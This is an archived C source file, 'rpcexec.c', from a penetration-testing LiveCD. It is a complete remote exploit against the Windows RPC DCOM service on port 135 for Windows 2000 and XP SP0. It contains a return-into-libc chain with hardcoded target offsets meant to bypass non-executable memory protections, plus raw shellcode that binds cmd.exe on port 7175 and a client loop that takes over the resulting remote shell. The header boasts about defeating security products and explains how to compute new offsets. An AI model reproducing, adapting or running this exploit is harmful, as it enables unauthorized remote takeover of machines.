home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / rpcexec.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  16KB  |  480 lines

  1. /*
  2.  * have you recently bought one of those expensive new windows security products
  3.  * on the market? do you think you now have strong protection?
  4.  * Look again:
  5.  *
  6.  * *rpc!exec* 
  7.  * by ins1der (trixterjack yahoo com)
  8.  *
  9.  * windows remote return into libc exploit!
  10.  *
  11.  * remote rpc exploit breaking non exec memory protection schemes
  12.  * tested against : 
  13.  *        OverflowGuard 
  14.  *        StackDefender (kernel32 imagebase randomization:O nice try guys.)
  15.  *             
  16.  *
  17.  * currently breaking:
  18.  * Windows 2000 SP0 (english)
  19.  * Windows XP SP0 (english)
  20.  *
  21.  * to get new offsets use this:
  22.  * ------------------------------
  23.  *     #include <windows.h>
  24.  *    #include <stdio.h>
  25.  *    
  26.  *    int main()
  27.  *    {
  28.  *    HANDLE h1,h2;
  29.  *    unsigned long addr1,addr2,addr3,addr4;
  30.  *    h1=LoadLibrary("ntdll.dll");
  31.  *    h2=LoadLibrary("MSVCRT.dll");
  32.  *    addr1=(unsigned long)GetProcAddress(h1,"NtAllocateVirtualMemory");
  33.  *    addr2=(unsigned long)GetProcAddress(h2,"memcpy");
  34.  *    addr3=(unsigned long)GetProcAddress(h1,"NtProtectVirtualMemory");
  35.  *        for (addr4=addr1;addr4<addr1+0xffff;addr4++)
  36.  *            {
  37.  *            if (!memcmp((void*)addr4,"\xc9\xc3",2)) break;
  38.  *            }
  39.  *    printf("0x%x 0x%x 0x%x 0x%x\n",addr1,addr2,addr3,addr4);
  40.  *    return 0;
  41.  *    }
  42.  * -----------------------------
  43.  * to get the last offset use a standard rpc dcom exploit with the last
  44.  * \x90\x90 before the shellcode replaced with \xcd\x21. run the exploit
  45.  * and read the drwatson logs. substract 0xA5 from the fault address.
  46.  *
  47.  *
  48.  *     Shouts go to: 
  49.  *        w00pz, SpaceCow, Int3, lacroix, misu200, j00(xor),
  50.  *        s0ny, crisis, and to all my true friends.
  51.  *    
  52.  *    
  53.  *     Enjoy!
  54.  * 
  55.  */
  56.  
  57. #include <sys/socket.h>
  58. #include <netinet/in.h>
  59.  
  60. unsigned char bindstr[]={
  61. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  62. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  63. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
  64. 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  65. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  66.  
  67. unsigned char request1[]={
  68. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
  69. 0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
  70. 0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
  71. 0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  72. 0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
  73. 0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
  74. 0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
  75. 0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
  76. 0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
  77. 0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
  78. 0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
  79. 0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
  80. 0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
  81. 0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
  82. 0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  83. 0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
  84. 0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
  85. 0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
  86. 0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
  87. 0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
  88. 0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
  89. 0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
  90. 0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
  91. 0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
  92. 0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
  93. 0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
  94. 0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
  95. 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  96. 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  97. 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  98. 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  99. 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
  100. 0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
  101. 0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  102. 0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
  103. 0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
  104. 0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
  105. 0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
  106. 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  107. 0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
  108. 0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
  109. 0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
  110. 0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
  111. 0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
  112. 0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  113. 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
  114. 0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
  115. 0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  116. 0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
  117. 0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
  118. 0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
  119. 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  120. 0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
  121. 0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
  122.  
  123. unsigned char request2[]={
  124. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
  125. };
  126.  
  127. unsigned char request3[]={
  128. 0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
  129. 0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
  130. 0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
  131. 0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  132.  
  133. unsigned char request4[]={
  134. 0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
  135. 0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
  136. 0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  137. };
  138.  
  139.  
  140. struct offset
  141. {
  142. char *description;
  143. unsigned long valloc;
  144. unsigned long amemcpy;
  145. unsigned long vprot;
  146. unsigned long ret;
  147. unsigned long frame;
  148. };
  149. struct offset targets[]=
  150. {
  151.     {"Windows 2000 SP0 (english)",
  152.         0x77f95da9,
  153.             0x78001194,
  154.         0x77f82ffb,
  155.         0x77f96800,
  156.         0x52f770
  157.     }
  158.     ,
  159.     {"Windows XP   SP0 (english)",
  160.             0x77f7e4c3,
  161.             0x77c42e10,
  162.             0x77f7ec43,
  163.             0x77f80a07,
  164.             0x5bf79c
  165.     }
  166.     ,
  167.     {NULL,0,0,0,0,0}
  168. };
  169.  
  170.  
  171. unsigned char shell[]=
  172.          
  173.     "\x46\x00\x58\x00"
  174.     "\x4E\x00\x42\x00"
  175.     "\x46\x00\x58\x00"
  176.     "\x46\x00\x58\x00"
  177.     
  178.     "\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  179.  
  180.     "\xff\xff\xff\xff"
  181.       "\xff\xff\xff\xff" 
  182.  
  183.         "\xcc\xe0\xfd\x7f"
  184.         "\xcc\xe0\xfd\x7f"
  185.  
  186.         "\x90\x90\x90\x90"
  187.     "\x90\x90\x90\x90"
  188.     "\x90\x90\x90\x90"
  189.     "\x90\x90\x90\x90"
  190.         "\x90\x90\x90\x90"
  191.     "\x90\x90\x90\x90"
  192.     "\x90\x90\x90\x90"
  193.     "\x90\x90\x90\x90"
  194.     "\x90\x90\x90\x90"
  195.  
  196.     "\x90\x90\x90\x90"
  197.         "\x90\x90\x90\x90"
  198.     "\x90\x90\x90\x90"
  199.     "\x90\x90\x90\x90"
  200.     "\x90\x90\x90\x90"
  201.         "\x90\x90\x90\x90"
  202.     
  203.     "\x90\x90\x90\x90"
  204.     "\x90\x90\x90\x90"
  205.     "\x90\x90\x90\x90"
  206.         "\x90\x90\x90\x90"
  207.     "\x90\x90\x90\x90"
  208.     "\x90\x90\x90\x90"
  209.     "\x90\x90\x90\x90"
  210.     "\x90\x90\x90\x90"
  211.     
  212.     
  213.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  214.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  215.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  216.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  217.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  218.     
  219.     "\x83\xec\x34\x8b\xf4\xe8\x47\x01\x00\x00\x89\x06\xff\x36\x68\x8e"
  220.     "\x4e\x0e\xec\xe8\x61\x01\x00\x00\x89\x46\x08\xff\x36\x68\xad\xd9"
  221.     "\x05\xce\xe8\x52\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00\x00\x68"
  222.     "\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89\x46\x04"
  223.     "\xff\x36\x68\x72\xfe\xb3\x16\xe8\x2d\x01\x00\x00\x89\x46\x10\xff"
  224.     "\x36\x68\xef\xce\xe0\x60\xe8\x1e\x01\x00\x00\x89\x46\x14\xff\x76"
  225.     "\x04\x68\xcb\xed\xfc\x3b\xe8\x0e\x01\x00\x00\x89\x46\x18\xff\x76"
  226.     "\x04\x68\xd9\x09\xf5\xad\xe8\xfe\x00\x00\x00\x89\x46\x1c\xff\x76"
  227.     "\x04\x68\xa4\x1a\x70\xc7\xe8\xee\x00\x00\x00\x89\x46\x20\xff\x76"
  228.     "\x04\x68\xa4\xad\x2e\xe9\xe8\xde\x00\x00\x00\x89\x46\x24\xff\x76"
  229.     "\x04\x68\xe5\x49\x86\x49\xe8\xce\x00\x00\x00\x89\x46\x28\xff\x76"
  230.     "\x04\x68\xe7\x79\xc6\x79\xe8\xbe\x00\x00\x00\x89\x46\x2c\x33\xff"
  231.     "\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50"
  232.     "\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x8b\xd8\x57\x57\x68\x02"
  233.     "\x00\x1c\x07\x8b\xcc\x6a\x16\x51\x53\xff\x56\x20\x57\x53\xff\x56"
  234.     "\x24\x57\x51\x53\xff\x56\x28\x8b\xd0\x68\x65\x78\x65\x00\x68\x63"
  235.     "\x6d\x64\x2e\x89\x66\x30\x83\xec\x54\x8d\x3c\x24\x33\xc0\x33\xc9"
  236.     "\x83\xc1\x15\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89"
  237.     "\x54\x24\x48\x89\x54\x24\x4c\x89\x54\x24\x50\x8d\x44\x24\x10\x54"
  238.     "\x50\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x8b"
  239.     "\xcc\x6a\xff\xff\x31\xff\x56\x0c\x8b\xc8\x57\xff\x56\x2c\xff\x56"
  240.     "\x14\x55\x56\x64\xa1\x30\x00\x00\x00\x85\xc0\x78\x0c\x8b\x40\x0c"
  241.     "\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09\x8b\x40\x34\x8b\xa8\xb8\x00"
  242.     "\x00\x00\x8b\xc5\x5e\x5d\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24"
  243.     "\x18\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b\x5a\x20"
  244.     "\x03\xdd\xe3\x32\x49\x8b\x34\x8b\x03\xf5\x33\xff\xfc\x33\xc0\xac"
  245.     "\x3a\xc4\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf2\x3b\x7c\x24\x14\x75"
  246.     "\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b"
  247.     "\x04\x8b\x03\xc5\xeb\x02\x33\xc0\x8b\xd5\x5f\x5e\x5d\x5b\xc2\x04"
  248.     "\x00\x90\x90\x90\x80\xbf\x32\x94\x80\xbf\x32\x94";
  249.  
  250.  
  251. struct frame1
  252. {
  253. unsigned long frame0;
  254. unsigned long ret;
  255. }fr1;
  256.  
  257. struct retstruct
  258. {
  259. unsigned long frame1;
  260. unsigned long valloc;
  261. unsigned long ret1;
  262. unsigned long dummy1;
  263. unsigned long pointer11;
  264. unsigned long zero;
  265. unsigned long pointer12;
  266. unsigned long type;
  267. unsigned long prot;
  268.  
  269. unsigned long frame2;
  270. unsigned long amemcpy;
  271. unsigned long ret2;
  272. unsigned long dest;
  273. unsigned long src;
  274. unsigned long size2;
  275.  
  276. unsigned long frame3;
  277. unsigned long vprot;
  278. unsigned long ret3;
  279. unsigned long dummy2;
  280. unsigned long pointer21;
  281. unsigned long pointer22;
  282. unsigned long newprot;
  283. unsigned long oldprot;
  284. }rets;
  285.  
  286. void prepare_ret(int id)
  287. {
  288.   rets.type=0x3000;
  289.   rets.prot=0x4;
  290.   rets.newprot=0x20;
  291.  
  292.   rets.valloc=targets[id].valloc;
  293.   rets.amemcpy=targets[id].amemcpy;
  294.   rets.vprot=targets[id].vprot;
  295.   fr1.ret=rets.ret1=rets.ret2=targets[id].ret;
  296.   fr1.frame0=targets[id].frame;
  297.  
  298.   rets.frame1=fr1.frame0+9*4;
  299.   rets.frame2=rets.frame1+6*4;
  300.   rets.oldprot=fr1.frame0;
  301.   rets.frame3=rets.frame1;
  302.   rets.size2=sizeof(shell);
  303.  
  304.   rets.src=fr1.frame0;
  305.   rets.dest=0x55555000;
  306.   rets.ret3=0x5555506c;
  307.  
  308.   rets.dummy1=rets.dummy2=0xffffffff;
  309.   rets.zero=0;
  310.  
  311.   *(int*)(shell+148)=0x55555000;
  312.   *(int*)(shell+152)=sizeof(shell);
  313.  
  314.   *(int*)(shell+140)=0x55555000;
  315.   *(int*)(shell+144)=sizeof(shell);
  316.  
  317.   rets.pointer11=fr1.frame0+92;
  318.   rets.pointer12=fr1.frame0+96;
  319.   rets.pointer21=fr1.frame0+100;
  320.   rets.pointer22=fr1.frame0+104;
  321.  
  322.   memcpy(shell+32,&fr1,sizeof(fr1));
  323.   memcpy(shell+48,&rets,sizeof(rets));
  324. }
  325.  
  326. void entershell(int sock)
  327. {
  328.   char buf[3000];
  329.   fd_set  fdr;
  330.   int rs;
  331.  
  332.   FD_ZERO(&fdr);
  333.   FD_SET(sock,&fdr);
  334.   FD_SET(0,&fdr);
  335.  
  336.   for(;;) 
  337.   {
  338.     FD_SET(sock, &fdr);
  339.     FD_SET(0, &fdr);
  340.     if(select(FD_SETSIZE,&fdr,NULL,NULL,NULL)<0) break;
  341.     if(FD_ISSET(sock, &fdr)) 
  342.       {
  343.         if((rs=read(sock,buf,sizeof(buf)))<0)
  344.         {
  345.            printf("connection lost\n");
  346.            return;
  347.         }
  348.         if(write(1,buf,rs)<0) break;
  349.       }
  350.  
  351.     if(FD_ISSET(0,&fdr)) 
  352.       {
  353.         if((rs=read(0,buf,sizeof(buf)))<0)
  354.         {
  355.            printf("[-] Connection lost..\n");
  356.            exit(1);
  357.         }
  358.         if (write(sock,buf,rs) < 0) break;
  359.       }
  360.         usleep(100);
  361.    }
  362.         
  363.    printf("connection closed\n");
  364.  
  365.    return;
  366. }
  367.  
  368.  
  369. int main(int argc, char **argv)
  370. {
  371.     
  372.     int sock,i,len1;
  373.     struct sockaddr_in sin;
  374.     unsigned char buf1[0x1000],buf2[0x1000];
  375.  
  376.     if(argc<3)
  377.     {   
  378.     printf("###############################\n");
  379.     printf("return into libc rpc exploit\n");
  380.     printf("ins1der 2003\n");
  381.     printf("downloaded on www.k-otik.com\n");
  382.     printf("*****************************************\n");
  383.         printf("usage: %s <ip> <id>\n", argv[0]);
  384.     printf("*****************************************\n");
  385.         printf("targets:\n");
  386.     printf("-----------------------------------------\n");
  387.         for (i=0;targets[i].description!= NULL;i++)
  388.             {
  389.             printf("%d\t%s\n",i,targets[i].description);   
  390.             }
  391.     printf("-----------------------------------------\n");
  392.         
  393.         return 0;
  394.     }
  395.     
  396.         
  397.      
  398.  
  399.     printf("Exploiting %s...\n",argv[1]);
  400.       
  401.     prepare_ret(atoi(argv[2]));
  402.     
  403.     sin.sin_family=AF_INET;
  404.     sin.sin_addr.s_addr=inet_addr(argv[1]);
  405.     sin.sin_port=htons(135);
  406.  
  407.     if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
  408.     {
  409.         perror("socket ");
  410.         return 0;
  411.     }
  412.     
  413.     if(connect(sock,(struct sockaddr*)&sin, sizeof(sin)))
  414.     {
  415.         perror("connect ");
  416.         return 0;
  417.     }
  418.     
  419.     memcpy(buf2,request1,sizeof(request1));
  420.     len1=sizeof(request1);
  421.     
  422.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(shell)/2;  
  423.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(shell)/2;
  424.     
  425.     memcpy(buf2+len1,request2,sizeof(request2));
  426.     len1=len1+sizeof(request2);
  427.     memcpy(buf2+len1,shell,sizeof(shell));
  428.     len1=len1+sizeof(shell);
  429.     memcpy(buf2+len1,request3,sizeof(request3));
  430.     len1=len1+sizeof(request3);
  431.     memcpy(buf2+len1,request4,sizeof(request4));
  432.     len1=len1+sizeof(request4);
  433.     
  434.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(shell)-0xc;
  435.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(shell)-0xc;
  436.  
  437.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(shell)-0xc;
  438.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(shell)-0xc;
  439.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(shell)-0xc;
  440.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(shell)-0xc;
  441.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(shell)-0xc;
  442.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(shell)-0xc;
  443.     
  444.     if (send(sock,(char*)bindstr,sizeof(bindstr),0)==-1)
  445.     {
  446.             perror("send");
  447.             return 0;
  448.     }
  449.  
  450.     recv(sock,(char*)buf1,1000,0);
  451.     
  452.     if (send(sock,(char*)buf2,len1,0)== -1)
  453.     {
  454.             perror("send");
  455.             return 0;
  456.     }
  457.     close(sock);
  458.  
  459.     sleep(1);
  460.     
  461.     sin.sin_port = htons(7175);
  462.  
  463.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
  464.     {
  465.         perror("socket");
  466.         return(0);
  467.     }
  468.     
  469.     if(connect(sock,(struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
  470.     {
  471.         printf("Exploit failed\n");
  472.         return(0);
  473.     }   
  474.     
  475.     printf("Entering shell\n");
  476.     entershell(sock);
  477.     return 1;
  478.  
  479. }
  480.